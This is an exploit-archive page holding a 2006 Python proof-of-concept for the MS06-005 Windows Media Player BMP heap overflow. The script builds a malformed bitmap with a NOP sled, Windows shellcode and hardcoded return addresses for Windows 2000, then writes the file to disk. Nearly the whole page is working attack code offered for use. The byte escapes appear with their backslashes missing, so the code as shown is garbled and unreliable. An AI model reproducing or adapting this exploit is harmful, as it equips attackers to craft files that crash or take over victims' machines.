Windows Media Player 7.1 <= 10 BMP Heap Overflow PoC (MS06-005) (2)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Windows Media Player 7.1 <= 10 BMP Heap Overflow PoC (MS06-005) (2)
# Published : 2006-02-16
# Author : redsand
# Previous Title : Mozilla Firefox 1.5 location.QueryInterface() Code Execution (osx)
# Next Title : eXchange POP3 5.0.050203 (rcpt to) Remote Buffer Overflow Exploit

# sploit creater by redsand@blacksecurity.org
# ms06-005 advisory proof of concept
# heap overflow in wmf.dll @ 0x0035920a
# denial of service, cuz we can't get this to play nice
    
#shamelessly stolen from CANVAS code
def intel_order(i):
    str=""
    a=chr(i % 256)
    i=i >> 8
    b=chr(i % 256)
    i=i >> 8
    c=chr(i % 256)
    i=i >> 8
    d=chr(i % 256)
    
    str+="%c%c%c%c" % (a,b,c,d)

    return str

def stroverwrite(instring,overwritestring,offset):
    head=instring[:offset]
    #print head
    tail=instring[offset+len(overwritestring):]
    #print tail
    result=head+overwritestring+tail
    return result


#options
#SEH HAndle

#anything with a call/jmp  edi/ecx + 4 or more
EIP=0x75e1692c # call edi +20 for win2k pro eng in oleaut
DUMMY=0xccccccccL
filename = "rbl4ck-06-005.bmp"

header =  "x42x4dx00x00x00x00x00x00x00x00x06x00x00x00x28x00"
header += "x00x00x01x00x00x00x01x00x00x00x01x00x04x00x00x00"
header += "x00x00x00x01x00x00x01x00x00x00x01x00x04x00x00x00"
header += "x00x00x00x00x00x00x00x00x00xCC"

c0de    = "x90" * 350
c0de    +=  "xCDx03" 
c0de    += "xEBx61x56x6Ax30x59x64x8Bx01x8Bx40x0C"
c0de    += "x8Bx70x1CxADx8Bx40x08x5ExC3x60x8Bx6C"
c0de    += "x24x24x8Bx45x3Cx8Bx54x05x78x01xEAx8B"
c0de    += "x4Ax18x8Bx5Ax20x01xEBxE3x34x49x8Bx34"
c0de    += "x8Bx01xEEx31xFFx31xC0xFCxACx84xC0x74"
c0de    += "x07xC1xCFx0Dx01xC7xEBxF4x3Bx7Cx24x28"
c0de    += "x75xE1x8Bx5Ax24x01xEBx66x8Bx0Cx4Bx8B"
c0de    += "x5Ax1Cx01xEBx8Bx04x8Bx01xE8x89x44x24"
c0de    += "x1Cx61xC3xE8x9AxFFxFFxFFx68x98xFEx8A"
c0de    += "x0Ex50xE8xA2xFFxFFxFFxEBx02xEBx05xE8"
c0de    += "xF9xFFxFFxFFx5Bx83xC3x1Cx33xC9x88x0B"
c0de    += "x83xEBx0Bx41x51x53xFFxD0x90x6Ex6Fx74"
c0de    += "x65x70x61x64x2Ex65x78x65x01"
#tag
c0de    += "0wn3dbyr3ds4nd"

for on in range(256):
    c0de += intel_order(EIP-80)

body = ""
r=0x88888800L
for on in range(235):
    r+=0x01L
    body += intel_order(r)

    
body    += c0de

body = stroverwrite(body,intel_order(EIP-4),56)
body = stroverwrite(body,intel_order(EIP),96)
body = stroverwrite(body,intel_order(EIP),160)
body = stroverwrite(body,intel_order(EIP-0x3c),708)
body = stroverwrite(body,intel_order(EIP),828)
body = stroverwrite(body,intel_order(EIP),868)
body = stroverwrite(body,intel_order(EIP),936)
#
#here's our call eax+4
body = stroverwrite(body,intel_order(EIP-4),948)
#
#
body = stroverwrite(body,intel_order(EIP),300)





print "MS06-005 Heap Overflow by redsand [at] blacksecurity.org"
print "Writing filename " + filename + "..."

try:                                
    fsock = open(filename, "wb+", 0) 
    try:                           
        fsock.write(header + body ); 
    finally:                        
        fsock.close()
except IOError:                     
    pass


print "success."

# www.Syue.com [2006-02-16]